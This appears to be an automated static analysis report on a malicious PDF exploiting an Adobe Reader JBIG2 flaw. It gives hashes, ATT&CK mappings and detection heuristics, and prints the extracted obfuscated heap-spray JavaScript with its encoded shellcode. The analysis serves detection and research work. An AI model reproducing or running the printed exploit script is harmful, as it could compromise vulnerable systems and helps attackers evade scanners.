Malicious PDF — malware analysis report

Static analysis result for SHA-256 5b576dc9b8ad292c…

MALICIOUS

PDF

6.1 KB First seen: 2013-08-01
MD5: 9e4bb2360013e3c6c2b7daa7a6e540ad SHA-1: d76356b90e8dc83022be7d5fc584c72ed3ebd06d SHA-256: 5b576dc9b8ad292c06c27c7dc84b87c71765c5ee9b6c4faf8d1d50e178d12639
466 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains obfuscated JavaScript that utilizes the unescape function, indicative of a heap spray exploit targeting Adobe Reader (CVE-2009-0658). The embedded JavaScript is designed to decompress and execute shellcode, which is then likely used to download and run a secondary malicious payload. The ML classifier and ClamAV detections further support the malicious nature of this file.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 9

  • Adobe Reader JBIG2Decode generic heap-spray exploit critical CVE likely CVE_2009_0658_GENERIC_SPRAY
    PDF combines JBIG2Decode image streams with JavaScript heap-spray or decoder scaffolding. This is likely CVE-2009-0658-family Adobe Reader JBIG2 exploitation, but it lacks the stricter Reader-9 version gate or decoded page-word shellcode fingerprint required by the exact rule.
  • JBIG2 + active content high CVE related PDF_JBIG2_ACTIVE_CONTENT
    JBIG2Decode appears with JavaScript/XFA/RichMedia — a related indicator for JBIG2 parser-exploit families including CVE-2021-30860 and CVE-2009-0658, but not a unique CVE fingerprint.
  • ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
      var SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx = "";
      var DjqfxcqBGDfityfcaxBKyADobZTKPJpdGXwIYVqVsdjj = unescape("%u40f9%u9849%u9349%u4e97%u9349%ufc4a%u4a40%u98d6%u464b%u494e%u49fc%u9f27%u4747%u979b%u41f5%u9849%u969b%u4a9b%u9993%u4a91%ufc40%uf8f5%u4f41%u48d6%u4b46%uf8d6%u4742%u9348%u42f5%u4037%u4027%u429f%u4397%u4096%u9927%u93f5%u489f%u4a47%u4e46%u4b97%u49d6%u934b%u37f9%u4ad6%u9b46%u9848%u4196%u914b%u41f9%u3f40%ud640%u379f%u4e4b%u9093%u9996%u934f%u919f%u4692%u48f5%u4f40%u9998%uf5f9%uf598%u48f8%u274e%u924f%ud69b%u2ff9%u374f%u4840%u40d6%u4937%uf5f …
      var E = "";
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • JBIG2Decode filter medium PDF_JBIG2
    JBIG2 image decoder present — historically used in zero-click exploits
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x21F 5036 bytes
SHA-256: a90af2849ef4f18582a431608148e1d9a6931a9aaecb53947f18e88158f639c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 10 of 14 identifiers look randomly generated (e.g. 'fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVv') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var yWreORECnnRNReTldplFxXiUXjAM = "";
		var SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx = "";
		var DjqfxcqBGDfityfcaxBKyADobZTKPJpdGXwIYVqVsdjj = unescape("%u40f9%u9849%u9349%u4e97%u9349%ufc4a%u4a40%u98d6%u464b%u494e%u49fc%u9f27%u4747%u979b%u41f5%u9849%u969b%u4a9b%u9993%u4a91%ufc40%uf8f5%u4f41%u48d6%u4b46%uf8d6%u4742%u9348%u42f5%u4037%u4027%u429f%u4397%u4096%u9927%u93f5%u489f%u4a47%u4e46%u4b97%u49d6%u934b%u37f9%u4ad6%u9b46%u9848%u4196%u914b%u41f9%u3f40%ud640%u379f%u4e4b%u9093%u9996%u934f%u919f%u4692%u48f5%u4f40%u9998%uf5f9%uf598%u48f8%u274e%u924f%ud69b%u2ff9%u374f%u4840%u40d6%u4937%uf5fd%u41f5%u4890%u4642%u9042%u9f93%u9140%u9046%u9693%u994a%u494b%u9149%u2f47%ufd43%u4937%u3f4f%u4af8%u4240%u2f90%u9042%u9642%u4e43%u49fc%u4a92%u27f5%ufc96%u9f49%u37fd%u9691%u4ef8%u4748%u9341%uf948%u9327%u40f9%u9796%u9693%u4f43%u9792%u9996%u974a%u9243%u9327%u4827%u9392%ufd42%u4a91%u9f37%u9098%u9f49%u3ff8%uf94e%ufc43%u4b47%u2746%u4848%u97fc%u4f46%u4027%uf9fc%uf5d6%u4ef5%u40fc%uf54b%ufc99%u9190%u2747%u9027%u3f91%u3f46%uf998%u4b96%u9343%u279b%u4948%u4827%ud691%u4047%u4f4e%u4993%u4bd6%u4940%u4090%u4f9f%u4a96%u47f5%u3f91%u4842%u4f37%u279f%u989f%u91fd%ufd99%uf93f%u2f41%u929b%u2747%u4127%ud646%uf599%ufd48%u4027%u379f%u9296%u37f8%u4940%u9649%u3740%u4ad6%u274a%u9241%u4943%u4293%u422f%u912f%u374f%u4099%ud6fc%uf848%u9197%uf546%u4f47%u9746%u434f%uf942%ufd49%u9749%u27fd%u2f37%ud69f%u98fd%u4a2f%u4e41%u4b48%u9897%u4e49%u2ff5%u4098%u3f9b%uf84a%u9f2f%u9043%u9797%u4f90%uf547%u9947%u964b%uf843%u41f5%ufc90%u2ffc%uf99f%u9b47%uf991%u999f%u414f%u3f4f%u2f98%u2f41%u4143%u4848%u9690%u9ff9%u999f%u4ffc%u4248%u4399%u934a%u46f5%u9393%u4640%u92fc%u9f98%u91f5%u2f41%u48f5%u4ef9%u494e%u9bfd%ufd37%u4747%ufcf9%u4a49%u902f%uf840%u3ff5%u4f92%u4990%ufd99%u4340%u934e%u4897%u90fc%ufc98%u9f92%u4648%u4891%u4b37%uf949%u464f%u2747%u4f97%u9f97%u4691%u9140%uf541%ud637%u9837%u982f%u4b46%u2798%u4bf9%u3f27%uf841%u484b%u489f%u2747%ufc96%u4797%u4e48%ufd4b%u923f%uf847%ufc98%ud649%u9b4f%u984e%u2747%u9027%uf837%u974a%ufc4e%ufd46%uf946%u40f8%u9f91%u9b98%u9647%u4e98%u96f9%u9896%u4396%u9f90%u4a98%ufc3f%u4990%u4b42%ud648%u9392%u9b48%uf52f%u9f93%u93f8%u2f37%u2f4a%uf54b%u9193%u424a%u374f%u4791%u2799%uf94f%u2797%u4347%u3ff5%u4637%u9398%u4e46%u989f%u3f42%u9b90%u904f%u9893%u4999%u4a4f%u2f96%ufd9f%u47d6%u4298%ud6f5%ufc46%ubf4f%ufebc%u2daa%uccda%u74d9%uf424%u335b%ub1c9%u3149%u147b%ueb83%u03fc%u107b%u0b5e%uc556%uf417%u16a7%u7c47%u2742%u1a55%u1a06%u6869%u974a%u3c02%u2c7f%ue966%u8570%ucfcc%u16bf%ucfe1%ud46c%uac60%u096e%u8d42%u5ca0%uca83%uafdd%u83d1%u02aa%ua0c5%u9eef%u66e4%u9e64%u039e%u6bbb%u0d14%uc4ec%u4523%u6e14%u766b%ua325%u4a68%uc86c%u385a%u186f%uc193%u6441%ufc7f%u696d%u387e%u9249%u32f5%u2fa9%u810d%uebd3%u1498%u7f73%ufd3a%uac85%u76dc%u1989%ud1ab%u9c8e%u6a78%u15aa%ubd7f%u6d3a%u195b%u3566%u38c2%u98c2%u5bfb%u45aa%u1759%u9159%u7adb%u5636%u84d1%uf0c6%uf662%u5ff4%u90d8%u28b4%u67c6%u02ba%uf8be%uad45%ud1be%uf981%u49ee%u8223%u8a65%u57cc%uda29%u0862%u8a89%uf8c2%uc161%u27cc%uea91%u4006%u103b%uafc1%u1b13%u5812%u1c61%uc405%ufaec%ue44f%u55b8%u9df8%u2ee1%u6299%u4b3c%ue999%uabb2%u1a54%ubfbf%uea01%ue28a%uf584%u8821%u6028%u1bcd%u1c7e%u7acf%u8348%ua930%u0ac2%u12a4%u72bd%u9328%u253d%u9322%u9155%uc016%ude40%u7483%u4bd9%u2d2b%udc8d%ud343%u2be8%u2ccc%uaddf%ufb31%u2826%u8943%uf04a");
		var E = "";

		for (ygvrYmxBO=128;ygvrYmxBO>=0;--ygvrYmxBO) E += unescape("%u4643%u4b4f");
		Cxzn = E + DjqfxcqBGDfityfcaxBKyADobZTKPJpdGXwIYVqVsdjj;
		nohJ = unescape("%u4643%u4b4f");
		FXIr = 20;
		LFcEerfenYRqDKJxidHEdpHXhtnW = FXIr+Cxzn.length
		while (nohJ.length<LFcEerfenYRqDKJxidHEdpHXhtnW) nohJ+=nohJ;
		SNoriiQHVHWXhSBsr = nohJ.substring(0, LFcEerfenYRqDKJxidHEdpHXhtnW);
		tGVSUZ = nohJ.substring(0, nohJ.length-LFcEerfenYRqDKJxidHEdpHXhtnW);
		while(tGVSUZ.length+LFcEerfenYRqDKJxidHEdpHXhtnW < 0x40000) tGVSUZ = tGVSUZ+tGVSUZ+SNoriiQHVHWXhSBsr;
		ptLRHBzMtjCrRmDkFYxWEmcEiRgnotuUKxinNCHonPYyLM = new Array();
		for (ygvrYmxBO=0;ygvrYmxBO<100;ygvrYmxBO++) ptLRHBzMtjCrRmDkFYxWEmcEiRgnotuUKxinNCHonPYyLM[ygvrYmxBO] = tGVSUZ + Cxzn;

		for (ygvrYmxBO=142;ygvrYmxBO>=0;--ygvrYmxBO) SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx += unescape("%ub550%u0166");
		uAYYyTgFjOhDsg = SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx.length + 20
		while (SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx.length < uAYYyTgFjOhDsg) SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx += SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx;
		FPCwA = SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx.substring(0, uAYYyTgFjOhDsg);
		fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVvbcLUmvzd = SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx.substring(0, SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx.length-uAYYyTgFjOhDsg);
		while(fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVvbcLUmvzd.length+uAYYyTgFjOhDsg < 0x40000) fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVvbcLUmvzd = fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVvbcLUmvzd+fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVvbcLUmvzd+FPCwA;
		CzS = new Array();
		for (ygvrYmxBO=0;ygvrYmxBO<125;ygvrYmxBO++) CzS[ygvrYmxBO] = fSzEGJqEGAVIyGLwFWkQkNoMfoOiBFMxAZMabeVvbcLUmvzd + SsslrggDhPnWawwEsCjEpsLeNHEHnxgSKlbSFfmhfOx;
javascript_obj0006_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 6 at offset 0x21F 1024 bytes
SHA-256: e01e54f87d044b5491d79e43f7b9b876580bc6bdae495daa7657d018628c4500
Detection
ClamAV: Win.Trojan.MSShellcode-6360729-4
Obfuscation or payload: unlikely